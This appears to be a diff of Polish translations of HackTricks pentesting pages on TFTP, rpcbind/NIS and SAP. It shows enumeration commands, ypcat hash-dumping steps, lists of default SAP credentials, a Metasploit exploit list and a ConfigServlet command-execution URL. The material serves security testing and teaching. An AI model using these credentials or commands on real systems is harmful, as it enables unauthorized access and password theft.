~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10
```
@ -51,7 +51,7 @@ Konfiguracja przełącznika **10.10.100.10** znajdzie się w folderze **tftp/**
<figure><img src="../.gitbook/assets/image (1113).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -59,7 +59,7 @@ Konfiguracja przełącznika **10.10.100.10** znajdzie się w folderze **tftp/**
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć, jak Twoja **firma jest reklamowana w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem**? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks**? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF**? Sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* **Dołącz do** [**💬**](https://emojipedia.org/speech-balloon/) [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**

16
network-services-pentesting/69-udp-tftp.md
View file

@ -4,7 +4,7 @@
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCYJNY**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -12,7 +12,7 @@ Inne sposoby wsparcia HackTricks:
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -28,9 +28,9 @@ Inne sposoby wsparcia HackTricks:
PORT STATE SERVICE REASON
69/udp open tftp script-set
```
# Wyliczenie
# Wyliczanie
TFTP nie zapewnia listy katalogów, więc skrypt `tftp-enum` z `nmap` spróbuje przeprowadzić atak siłowy na domyślne ścieżki.
TFTP nie zapewnia listy katalogów, więc skrypt `tftp-enum` z `nmap` będzie próbował siłowo odgadnąć domyślne ścieżki.
```bash
nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>
```
@ -52,7 +52,7 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
* `port:69`
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -63,10 +63,10 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na githubie.
</details>

32
network-services-pentesting/pentesting-rpcbind.md
View file

@ -2,19 +2,19 @@
<details>
<summary><strong>Zacznij od zera i zostań ekspertem od hakowania AWS dzięki</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Nauka hakowania AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na GitHubie.
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -33,13 +33,18 @@ PORT STATE SERVICE
rpcinfo irked.htb
nmap -sSUC -p111 192.168.10.1
```
```markdown
Czasami nie dostarcza żadnych informacji, w innych przypadkach otrzymasz coś takiego:
![](<../.gitbook/assets/image (550).png>)
### Shodan
* `port:111 portmap`
## RPCBind + NFS
Jeśli znajdziesz usługę NFS, prawdopodobnie będziesz mógł wyświetlać i pobierać (a być może także przesyłać) pliki:
Jeśli znajdziesz usługę NFS, prawdopodobnie będziesz mógł wyświetlać i pobierać (a być może przesyłać) pliki:
![](<../.gitbook/assets/image (869).png>)
@ -47,13 +52,14 @@ Przeczytaj [2049 - Testowanie penetracyjne usługi NFS](nfs-service-pentesting.m
## NIS
Eksploracja podatności **NIS** obejmuje dwuetapowy proces, zaczynając od zidentyfikowania usługi `ypbind`. Kamieniem węgielnym tej eksploracji jest odkrycie **nazwy domeny NIS**, bez której postęp zostaje zatrzymany.
Eksploracja podatności **NIS** obejmuje dwuetapowy proces, rozpoczynając od zidentyfikowania usługi `ypbind`. Kamieniem węgielnym tej eksploracji jest odkrycie **nazwy domeny NIS**, bez której postęp zostaje zatrzymany.
![](<../.gitbook/assets/image (856).png>)
Podróż eksploracyjna rozpoczyna się od zainstalowania niezbędnych pakietów (`apt-get install nis`). Kolejnym krokiem jest użycie `ypwhich` do potwierdzenia obecności serwera NIS poprzez pingowanie go z nazwą domeny i adresem IP serwera, upewniając się, że te elementy są zanonimizowane dla bezpieczeństwa.
Podróż eksploracyjna rozpoczyna się od zainstalowania niezbędnych pakietów (`apt-get install nis`). Kolejnym krokiem jest użycie `ypwhich` do potwierdzenia obecności serwera NIS poprzez pingowanie go nazwą domeny i adresem IP serwera, upewniając się, że te elementy są zanonimizowane ze względów bezpieczeństwa.
Ostateczny i kluczowy krok polega na użyciu polecenia `ypcat` do wydobycia wrażliwych danych, w szczególności zaszyfrowanych haseł użytkowników. Te hashe, raz złamane za pomocą narzędzi takich jak **John the Ripper**, ujawniają wgląd w dostęp do systemu i uprawnienia.
```
```bash
# Install NIS tools
apt-get install nis
@ -64,7 +70,7 @@ ypcat d <domain-name> h <server-ip> passwd.byname
```
### Pliki NIF
| **Plik główny** | **Mapy** | **Notatki** |
| **Plik główny** | **Mapa(y)** | **Notatki** |
| ---------------- | --------------------------- | --------------------------------- |
| /etc/hosts | hosts.byname, hosts.byaddr | Zawiera nazwy hostów i szczegóły IP |
| /etc/passwd | passwd.byname, passwd.byuid | Plik hasła użytkownika NIS |
@ -77,11 +83,11 @@ Jeśli znajdziesz usługę **rusersd** wymienioną w ten sposób:
![](<../.gitbook/assets/image (1038).png>)
Możesz wyliczyć użytkowników na maszynie. Aby dowiedzieć się jak, przeczytaj [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md).
Możesz wyliczyć użytkowników na maszynie. Aby dowiedzieć się jak, przeczytaj [1026 - Testowanie penetracyjne Rsusersd](1026-pentesting-rusersd.md).
## Ominięcie zablokowanego portu Portmapper
Podczas przeprowadzania skanu **nmap** i odkrywania otwartych portów NFS, gdzie port 111 jest zablokowany, bezpośrednie wykorzystanie tych portów nie jest wykonalne. Jednakże, poprzez **symulowanie lokalnej usługi portmappera i tworzenie tunelu z Twojego urządzenia** do celu, eksploatacja staje się możliwa przy użyciu standardowych narzędzi. Ta technika pozwala ominąć zablokowany stan portu 111, umożliwiając dostęp do usług NFS. Aby uzyskać szczegółowe wskazówki dotyczące tej metody, zapoznaj się z artykułem dostępnym pod [tym linkiem](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc).
Podczas przeprowadzania skanu **nmap** i odkrywania otwartych portów NFS z portem 111 będącym zablokowanym, bezpośrednie wykorzystanie tych portów nie jest wykonalne. Jednakże, poprzez **symulowanie usługi portmapper lokalnie i tworzenie tunelu z Twojego urządzenia** do celu, eksploatacja staje się możliwa przy użyciu standardowych narzędzi. Ta technika pozwala ominąć zablokowany stan portu 111, umożliwiając dostęp do usług NFS. Aby uzyskać szczegółowe wskazówki dotyczące tej metody, zapoznaj się z artykułem dostępnym pod [tym linkiem](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc).
## Shodan
@ -91,7 +97,7 @@ Podczas przeprowadzania skanu **nmap** i odkrywania otwartych portów NFS, gdzie
* Praktykuj te techniki na [**maszynie HTB Irked**](https://app.hackthebox.com/machines/Irked).
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -125,10 +131,10 @@ Command: nmap -sSUC -p 111 {IP}
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na githubie.
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów na githubie.
</details>

64
network-services-pentesting/pentesting-sap.md
View file

@ -4,7 +4,7 @@
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCYJNY**](https://github.com/sponsors/carlospolop)!
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -12,20 +12,20 @@ Inne sposoby wsparcia HackTricks:
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
# Wprowadzenie do SAP
SAP oznacza Systemy, Aplikacje i Produkty w Przetwarzaniu Danych. SAP, z definicji, jest również nazwą oprogramowania ERP \(Planowanie Zasobów Przedsiębiorstwa\) oraz nazwą firmy.
System SAP składa się z kilku w pełni zintegrowanych modułów, które obejmują praktycznie każdy aspekt zarządzania biznesem.
SAP oznacza Systemy, Aplikacje i Produkty w Przetwarzaniu Danych. SAP, z definicji, jest również nazwą oprogramowania ERP \(Enterprise Resource Planning\) oraz nazwą firmy.
System SAP składa się z kilku w pełni zintegrowanych modułów, które obejmują praktycznie każdy aspekt zarządzania firmą.
Każda instancja SAP \(lub SID\) składa się z trzech warstw: bazy danych, aplikacji i prezentacji\), każdy krajobraz zwykle składa się z czterech instancji: dev, test, QA i produkcyjnej.
Każda z warstw może być wykorzystana w pewnym stopniu, ale największy efekt można osiągnąć, **atakując bazę danych**.
Każda instancja SAP jest podzielona na klientów. Każdy z nich ma użytkownika SAP\*, odpowiednik "roota" aplikacji.
Każda instancja SAP jest podzielona na klientów. Każdy ma użytkownika SAP\*, odpowiednik "roota" aplikacji.
Po początkowym utworzeniu, ten użytkownik SAP\* otrzymuje domyślne hasło: "060719992" \(więcej domyślnych haseł poniżej\).
Byłbyś zaskoczony, gdybyś wiedział, jak często te **hasła nie są zmieniane w środowiskach testowych lub deweloperskich**!
@ -36,8 +36,8 @@ Atak brutalny może pomóc, jednak może istnieć mechanizm blokady konta.
> Następna sekcja pochodzi głównie z [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) od użytkownika shipcod3!
* Sprawdź Zakres Aplikacji lub Krótki Program testowy. Zanotuj nazwy hostów lub instancje systemowe do połączenia z SAP GUI.
* Użyj OSINT \(otwartej inteligencji źródłowej\), Shodan i Google Dorks, aby sprawdzić pliki, subdomeny i cenne informacje, jeśli aplikacja jest wystawiona na Internet lub publiczna:
* Sprawdź Zakres Aplikacji lub Opis Programu do testowania. Zanotuj nazwy hostów lub instancje systemowe do połączenia z SAP GUI.
* Użyj OSINT \(open source intelligence\), Shodan i Google Dorks, aby sprawdzić pliki, subdomeny i cenne informacje, jeśli aplikacja jest wystawiona na Internet lub publiczna:
```text
inurl:50000/irj/portal
inurl:IciEventService/IciEventConf
@ -49,10 +49,10 @@ https://www.shodan.io/search?query=SAP+J2EE+Engine
```
* Oto jak wygląda [http://SAP:50000/irj/portal](http://sap:50000/irj/portal)
![Ekran logowania do SAP](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg)
![Ekran logowania SAP](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg)
* Użyj nmap do sprawdzenia otwartych portów i znanych usług \(routery sap, webdynpro, usługi sieciowe, serwery www, itp.\)
* Przeczesz adresy URL, jeśli działa na nim serwer WWW.
* Użyj nmap do sprawdzenia otwartych portów i znanych usług \(routery sap, webdnypro, usługi sieciowe, serwery www, itp.\)
* Przeczesz adresy URL, jeśli działa na nich serwer WWW.
* Przeprowadź fuzzing katalogów \(możesz użyć Burp Intruder\), jeśli działa na nich serwer WWW na określonych portach. Oto kilka dobrych list słów dostarczonych przez projekt SecLists do znajdowania domyślnych ścieżek SAP ICM oraz innych interesujących katalogów lub plików:
[https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls\_SAP.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/URLs/urls-SAP.txt)
@ -76,12 +76,12 @@ rhosts => 192.168.96.101
msf auxiliary(sap_service_discovery) > run
[*] 192.168.96.101: - [SAP] Beginning service Discovery '192.168.96.101'
```
## Testowanie Grubego Klienta / SAP GUI
## Testowanie Thick Client / SAP GUI
Oto polecenie do połączenia z SAP GUI
`sapgui <nazwa hosta serwera SAP> <numer systemu>`
* Sprawdź domyślne dane uwierzytelniające \(W klasyfikacji podatności Bugcrowd, jest to uważane za P1 -&gt; Błąd konfiguracji zabezpieczeń serwera \| Użycie domyślnych danych uwierzytelniających \| Serwer produkcyjny\):
* Sprawdź domyślne dane uwierzytelniające \(W taksonomii oceny podatności Bugcrowd, jest to uważane za P1 -&gt; Błąd konfiguracji zabezpieczeń serwera \| Użycie domyślnych danych uwierzytelniających \| Serwer produkcyjny\):
```text
# SAP* - High privileges - Hardcoded kernel user
SAP*:06071992:*
@ -132,29 +132,29 @@ SAP*:Down1oad:000,001
DEVELOPER:Down1oad:001
BWDEVELOPER:Down1oad:001
```
* Uruchom Wireshark, a następnie uwierzytelnij się w kliencie \(SAP GUI\) przy użyciu uzyskanych poświadczeń, ponieważ niektóre klienci przesyłają poświadczenia bez SSL. Istnieją dwa znane wtyczki do Wiresharka, które potrafią analizować główne nagłówki używane przez protokół SAP DIAG: wtyczka analizy SecureAuth Labs SAP oraz wtyczka SAP DIAG opracowana przez Positive Research Center.
* Sprawdź eskalacje uprawnień, takie jak korzystanie z niektórych kodów transakcji SAP \(tcodes\) przez użytkowników o niskich uprawnieniach:
* Uruchom Wireshark, a następnie uwierzytelnij się w kliencie \(SAP GUI\) przy użyciu uzyskanych poświadczeń, ponieważ niektórzy klienci przesyłają poświadczenia bez SSL. Istnieją dwa znane wtyczki do Wiresharka, które potrafią analizować główne nagłówki używane przez protokół SAP DIAG: wtyczka analizy SecureAuth Labs SAP oraz wtyczka SAP DIAG opracowana przez Positive Research Center.
* Sprawdź eskalacje uprawnień, takie jak korzystanie z niektórych kodów transakcji SAP \(tcodes\) dla użytkowników o niskich uprawnieniach:
* SU01 - Do tworzenia i zarządzania użytkownikami
* SU01D - Do wyświetlania użytkowników
* SU10 - Do masowej konserwacji
* SU02 - Do ręcznego tworzenia profili
* SM19 - Audyt bezpieczeństwa - konfiguracja
* SE84 - System informacyjny dla autoryzacji SAP R/3
* SE84 - System informacyjny uprawnień SAP R/3
* Sprawdź, czy możesz wykonywać polecenia systemowe / uruchamiać skrypty w kliencie.
* Sprawdź, czy możesz przeprowadzić atak XSS na eksploratorze BAPI
# Testowanie interfejsu sieciowego
# Testowanie interfejsu internetowego
* Przeczesz adresy URL \(patrz faza odkrywania\).
* Przeprowadź fuzzing adresów URL, jak w fazie odkrywania. Oto jak wygląda [http://SAP:50000/index.html](http://sap:50000/index.html):
* Przeczeszaj adresy URL \(patrz faza odkrywania\).
* Testuj adresy URL tak jak w fazie odkrywania. Oto jak wygląda [http://SAP:50000/index.html](http://sap:50000/index.html):
![Strona główna SAP](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/index.jpeg)
![Strona indeksowa SAP](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/index.jpeg)
* Szukaj powszechnych podatności sieciowych \(odwołaj się do OWASP Top 10\), ponieważ w niektórych miejscach występują podatności XSS, RCE, XXE, itp.
* Zapoznaj się z metodologią Jasona Haddixa [„Metodologia łowców błędów”](https://github.com/jhaddix/tbhm) do testowania podatności sieciowych.
* Szukaj powszechnych podatności internetowych \(Odniesienie do OWASP Top 10\), ponieważ w niektórych miejscach występują podatności typu XSS, RCE, XXE, itp.
* Zapoznaj się z metodologią Jasona Haddixa [„Metodologia łowców błędów”](https://github.com/jhaddix/tbhm) do testowania podatności internetowych.
* Autoryzacja za pomocą manipulacji czasownikami? Być może :\)
* Otwórz `http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#`, następnie kliknij przycisk „Wybierz”, a następnie w otwartym oknie naciśnij „Szukaj”. Powinieneś zobaczyć listę użytkowników SAP \(Odwołanie do podatności: [ERPSCAN-16-010](https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/)\)
* Czy poświadczenia są przesyłane przez HTTP? Jeśli tak, jest to uważane za P3 zgodnie z [Taxonomią Ocen Podatności Bugcrowd](https://bugcrowd.com/vulnerability-rating-taxonomy): Uszkodzona Autoryzacja i Zarządzanie Sesjami \| Słabe Logowanie Funkcji Przez HTTP. Wskazówka: Sprawdź również [http://SAP:50000/startPage](http://sap:50000/startPage) lub portale logowania :\)
* Otwórz `http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#`, a następnie kliknij przycisk „Wybierz”, a następnie w otwartym oknie naciśnij „Szukaj”. Powinieneś zobaczyć listę użytkowników SAP \(Odniesienie do podatności: [ERPSCAN-16-010](https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/)\)
* Czy poświadczenia są przesyłane przez HTTP? Jeśli tak, jest to uważane za P3 zgodnie z [Taxonomią Ocen Podatności Bugcrowd](https://bugcrowd.com/vulnerability-rating-taxonomy): Uszkodzona Autoryzacja i Zarządzanie Sesjami \| Słabe Logowanie Funkcji przez HTTP. Wskazówka: Sprawdź również [http://SAP:50000/startPage](http://sap:50000/startPage) lub portale logowania :\)
![Strona startowa SAP](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/startPage.jpeg)
@ -258,7 +258,7 @@ exploit/windows/lpd/saplpd 2008-02
exploit/windows/misc/sap_2005_license 2009-08-01 great SAP Business One License Manager 2005 Buffer Overflow
exploit/windows/misc/sap_netweaver_dispatcher 2012-05-08 normal SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
```
* Spróbuj użyć znanych exploitów (sprawdź Exploit-DB) lub ataków, takich jak stary, ale dobry "SAP ConfigServlet Remote Code Execution" w portalu SAP:
* Spróbuj użyć znanych exploitów \(sprawdź Exploit-DB\) lub ataków, takich jak stary, ale nadal skuteczny „SAP ConfigServlet Remote Code Execution” w portalu SAP:
```text
http://example.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=uname -a
```
@ -289,24 +289,24 @@ bizploit> start
# Inne Przydatne Narzędzia do Testowania
* [PowerSAP](https://github.com/airbus-seclab/powersap) - Narzędzie Powershell do oceny bezpieczeństwa SAP
* [Burp Suite](https://portswigger.net/burp) - niezbędne do fuzzowania katalogów i oceny bezpieczeństwa sieci web
* [Burp Suite](https://portswigger.net/burp) - niezbędne do fuzzowania katalogów i oceny bezpieczeństwa sieciowego
* [pysap](https://github.com/SecureAuthCorp/pysap) - Biblioteka Pythona do tworzenia pakietów protokołu sieciowego SAP
* [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Pomoc dla nmap w wykrywaniu SAP/ERP
## Referencje
## Odnośniki
* [Testowanie Przenikania SAP Za Pomocą Metasploita](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf)
* [https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - skrypt do półautomatyzacji Bizploit
* [Konfiguracja Bezpieczeństwa SAP NetWeaver ABAP część 3: Domyślne hasła dostępu do aplikacji](https://erpscan.com/press-center/blog/sap-netweaver-abap-security-configuration-part-2-default-passwords-for-access-to-the-application/)
* [Konfiguracja Bezpieczeństwa SAP NetWeaver ABAP, część 3: Domyślne hasła do dostępu do aplikacji](https://erpscan.com/press-center/blog/sap-netweaver-abap-security-configuration-part-2-default-passwords-for-access-to-the-application/)
* [Lista kodów transakcji ABAP związanych z bezpieczeństwem SAP](https://wiki.scn.sap.com/wiki/display/Security/List+of+ABAP-transaction+codes+related+to+SAP+security)
* [Atakowanie Portalu SAP](https://erpscan.com/wp-content/uploads/presentations/2012-HackerHalted-Breaking-SAP-Portal.pdf)
* [10 najciekawszych podatności i ataki w SAP](https://erpscan.com/wp-content/uploads/presentations/2012-Kuwait-InfoSecurity-Top-10-most-interesting-vulnerabilities-and-attacks-in-SAP.pdf)
* [Łamanie Portalu SAP](https://erpscan.com/wp-content/uploads/presentations/2012-HackerHalted-Breaking-SAP-Portal.pdf)
* [10 najciekawszych podatności i ataków w SAP](https://erpscan.com/wp-content/uploads/presentations/2012-Kuwait-InfoSecurity-Top-10-most-interesting-vulnerabilities-and-attacks-in-SAP.pdf)
* [Ocenianie bezpieczeństwa ekosystemów SAP za pomocą bizploit: Odkrywanie](https://www.onapsis.com/blog/assessing-security-sap-ecosystems-bizploit-discovery)
* [https://www.exploit-db.com/docs/43859](https://www.exploit-db.com/docs/43859)
* [https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/](https://resources.infosecinstitute.com/topic/pen-stesting-sap-applications-part-1/)
* [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures)
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -318,9 +318,9 @@ bizploit> start
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup oficjalne **gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Kup oficjalne [**gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

20
network-services-pentesting/pentesting-web/drupal.md
View file

@ -7,14 +7,14 @@
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
